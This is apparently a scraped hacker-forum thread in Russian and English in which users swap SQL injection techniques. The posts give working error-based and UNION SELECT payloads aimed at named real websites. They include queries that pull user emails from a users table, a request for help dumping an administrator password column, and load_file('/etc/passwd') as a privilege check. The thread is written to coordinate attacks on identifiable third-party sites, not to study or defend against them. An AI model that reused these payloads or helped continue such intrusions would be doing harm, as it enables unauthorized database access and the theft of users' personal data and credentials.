Не совсем верное утверждение, бывают случаи когда доступ к базе mysql действительно запрещен но файловые привилегии тем не менее есть. Самый верный способ узнать о наличии привилегий прочитать содержимого произвольного файла функцией load_file
Не выводил в статистику. База Mysql это последнее дело куда я смотрю (потому что phpmyadmin не частый гость, а порт mysql чаще либо закрыт, либо лежит где-то глубоко в сети), первым делом чекаю всю лафу load_file (кстати не вижу проблем в этой фразе "стоит ли заморачиваться лишний раз с load_file", что там замарачиваться? выполнить одну команду load_file('/etc/passwd') и ежи с ним?), magic_qoutes, и пользовательские таблицы с целью поиска паролей администраторов.
Hi friend please help me to get the datas from column: password table: unimitarbeiter and DB: koopdb vul link: http://www.int.uzh.ch/static/single/berichteonline/bericht.php?l=de&ri=IN&id=6935 injection is double query . .
Как в таком запросе провести иньекцию? через контактацию с ошибкой не получается http://www.fishingchel.ru/vodoemi/219?id=90%27
Code: http://www.fishingchel.ru/vodoemi/219?id=90')+or+1+group+by+concat(version(),floor(rand(0)*2))+having+min(0)+or+1+--+ Duplicate entry '4.1.22-lk-log1' for key 1
спс а вот тут PHP: http://kudapostupat.by/speciality/id/90%27%29+or+1+group+by+concat%28table_name+from+information_schema.tables,floor%28rand%280%29*2%29%29+having+min%280%29+or+1+--+ чё ет за ошибка? как обходится?
http://kudapostupat.by/speciality/id/-90%27%29+UNION+SELECT+1,2,3,table_name,5,6,7,8,9,10,11,12+from+information_schema.tables%23 =\
памяти не хватает для этого запроса. юзай лимит. http://kudapostupat.by/speciality/id/-90')+UNION+SELECT+1,2,3,user_email,5,6,7,8,9,10,11,12+from+kp_users+limit+1350--+ http://kudapostupat.by/speciality/id/-90')+UNION+SELECT+1,2,3,user_email,5,6,7,8,9,10,11,12+from+kp_users+limit+1350,1482--+ т.к. http://kudapostupat.by/speciality/id/-90')+UNION+SELECT+1,2,3,count(user_email),5,6,7,8,9,10,11,12+from+kp_users--+ а запрос прерывается ~ в показанном мной промежутке.
Возникла проблема со скулью... Пошерстил форум, вроде ничего не нашел( Вообщем: есть скуль http://xxx.xx/xxx.php?num=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11 в интересующей базе названия столбцов id,1,2,3... при таком запросе http://xxx.xx/xxx.php?num=-1+UNION+SELECT+group_concat(id,0x3A,2,0x3A,1+SEPARATOR+0x0b),2,3,4,5,6,7,8,9,10,11+FROM+xxx.bank возвращает строки вида (ид):2:1 То есть ид вытаскивает корректно, а остальные поля выводит числами указанными... как по другому обратиться к этим столбцам?
This is the parameter for the SQL injection , it could be POST SQL injection, I'm not entirely sure. Code: task=category§ionid=10&filter_order=on&filter=%BF%27%22%28&limitstart=0&filter_order_Dir=on&limit=on&id=54 To get the error I used HackBar for Firefox, I put in this first: Code: http://www.yaziyaz.net/Evrim/konular/54-inorganik-evrim.html Then I clicked on 'Enable Post data' and put in the parameter and I clicked on 'Execute' and it gave me the following error(s): Code: Warning: Invalid argument supplied for foreach() in /home/yaziyaz2/public_html/Evrim/components/com_content/models/category.php on line 337 Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/yaziyaz2/public_html/Evrim/libraries/joomla/database/database/mysql.php on line 344 How to inject next ???